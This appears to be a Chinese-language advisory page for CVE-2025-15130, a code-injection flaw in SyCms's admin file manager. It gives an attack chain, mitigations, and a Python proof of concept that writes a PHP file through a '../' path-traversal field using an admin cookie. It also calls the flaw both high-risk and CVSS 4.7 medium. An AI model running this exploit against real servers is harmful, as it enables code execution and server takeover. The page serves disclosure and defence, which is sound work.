CVE-2025-15130 shanyu SyCms管理员面板FileManageController.addPost代码注入漏洞

漏洞信息

漏洞编号

CVE-2025-15130

漏洞类型

代码注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

shanyu SyCms

漏洞概述

CVE-2025-15130是shanyu SyCms内容管理系统中的一个高危代码注入漏洞。该漏洞存在于管理员面板的文件管理功能中，具体位于Application/Admin/Controller/FileManageController.class.php文件的addPost函数。由于程序对用户输入缺乏充分的过滤和验证，攻击者可以通过构造恶意请求，在服务器端注入并执行任意代码。此漏洞需要管理员级别的高权限才能利用，但由于攻击向量为网络形式且无需用户交互，潜在危害仍然较大。漏洞影响版本为shanyu SyCms up to a242ef2d194e8bb249dc175e7c49f2c1673ec921。需要注意的是，该漏洞仅影响不再受维护者支持的产品版本。CVSS 4.7评分表明其具有中等严重性，主要影响系统的机密性、完整性和可用性。

技术细节

该代码注入漏洞发生在shanyu SyCms的管理员面板文件管理功能中。漏洞点位于FileManageController.class.php文件的addPost方法，该方法负责处理文件上传和管理请求。攻击者通过在HTTP请求中注入恶意代码，利用addPost函数对用户输入的不当处理，导致注入的代码在服务器端执行。由于漏洞位于管理员面板，攻击者需要具备管理员权限才能访问相关功能。然而，一旦攻击者获得管理员凭据或通过其他方式获取高权限账户，即可利用此漏洞在服务器上执行任意系统命令或PHP代码，实现对服务器的完全控制。攻击者可能利用此漏洞进行数据窃取、恶意文件上传或进一步的网络渗透攻击。

攻击链分析

STEP 1

1

攻击者获得shanyu SyCms管理员账户凭据

STEP 2

2

攻击者登录管理员面板并访问文件管理功能

STEP 3

3

攻击者构造恶意HTTP POST请求，在addPost函数参数中注入PHP代码

STEP 4

4

服务器端addPost函数未对用户输入进行安全过滤，执行注入的恶意代码

STEP 5

5

攻击者在服务器上创建恶意文件或直接执行系统命令

STEP 6

6

攻击者获得服务器完全控制权，可进行数据窃取、横向移动等后续攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-15130 PoC - shanyu SyCms Code Injection
# Target: shanyu SyCms up to a242ef2d194e8bb249dc175e7c49f2c1673ec921
# Component: Application/Admin/Controller/FileManageController.class.php
# Function: addPost

import requests
import sys

def exploit(target_url, admin_cookie):
    """
    Exploit code injection in FileManageController.addPost function
    """
    # Construct malicious payload for code injection
    payload = {
        'filename': 'test.php',
        'content': '<?php phpinfo(); ?>',  # Malicious PHP code
        'path': '../'  # Path traversal to write outside intended directory
    }
    
    # Target endpoint
    endpoint = f"{target_url}/index.php/Admin/FileManage/addPost"
    
    # Send exploit request
    headers = {
        'Cookie': admin_cookie,
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    try:
        response = requests.post(endpoint, data=payload, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Exploit sent successfully to {endpoint}")
            print(f"[+] Response: {response.text[:200]}")
        else:
            print(f"[-] Exploit failed with status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python3 {sys.argv[0]} <target_url> <admin_cookie>")
        print(f"Example: python3 {sys.argv[0]} http://target.com 'PHPSESSID=xxx'")
        sys.exit(1)
    
    target_url = sys.argv[1]
    admin_cookie = sys.argv[2]
    exploit(target_url, admin_cookie)

影响范围

shanyu SyCms <= a242ef2d194e8bb249dc175e7c49f2c1673ec921

防御指南

临时缓解措施

由于该漏洞影响的产品已不再受官方维护支持，建议立即采取以下措施：1）如果可能，迁移到其他活跃维护的CMS系统；2）限制管理员面板的网络访问，仅允许受信任的IP地址访问；3）实施严格的访问控制策略，使用强密码和多因素认证保护管理员账户；4）部署Web应用防火墙规则检测代码注入特征；5）定期审查服务器文件系统，检测是否有可疑文件被创建；6）考虑使用虚拟补丁技术临时阻断该漏洞的利用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15130
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15130
3 Details https://www.cvedetails.com/cve/CVE-2025-15130/
4 VulDB https://vuldb.com/cve/CVE-2025-15130
5 Link https://gitee.com/shanyu/SyCms/issues/IDCEWG
6 Link https://vuldb.com/?ctiid.338508
7 Link https://vuldb.com/?id.338508
8 Link https://vuldb.com/?submit.712813